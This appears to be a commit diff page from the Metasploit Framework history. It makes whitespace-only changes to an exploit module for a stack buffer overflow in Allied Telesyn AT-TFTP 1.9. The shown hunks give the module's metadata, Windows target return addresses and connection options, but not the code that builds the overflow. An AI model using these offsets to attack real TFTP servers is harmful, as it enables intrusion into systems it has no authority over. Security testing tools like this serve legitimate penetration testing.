whitespace tweaks
git-svn-id: file:///home/svn/framework3/trunk@9352 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
14a6a1b95f
commit
be158fbcb3
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
|
@ -22,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Allied Telesyn TFTP Server 1.9 Long Filename Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
|
||||
This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a
|
||||
request (get/write) for an overly long file name.
|
||||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
@ -50,22 +48,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
# Patrick - Tested OK w2k sp0, sp4, xp sp 0, xp sp2 - en 2007/08/24
|
||||
[ 'Windows NT SP4 English', { 'Ret' => 0x702ea6f7 } ],
|
||||
[ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ],
|
||||
[ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ],
|
||||
[ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ],
|
||||
[ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ],
|
||||
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
|
||||
[ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ],
|
||||
[ 'Windows 2000 SP0 English', { 'Ret' => 0x750362c3 } ],
|
||||
[ 'Windows 2000 SP1 English', { 'Ret' => 0x75031d85 } ],
|
||||
[ 'Windows 2000 SP2 English', { 'Ret' => 0x7503431b } ],
|
||||
[ 'Windows 2000 SP3 English', { 'Ret' => 0x74fe1c5a } ],
|
||||
[ 'Windows 2000 SP4 English', { 'Ret' => 0x75031dce } ],
|
||||
[ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ],
|
||||
[ 'Windows XP SP2 English', { 'Ret' => 0x71ab9372 } ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Nov 27 2006'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(69),
|
||||
Opt::LHOST() # Required for stack offset
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(69),
|
||||
Opt::LHOST() # Required for stack offset
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -83,4 +81,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue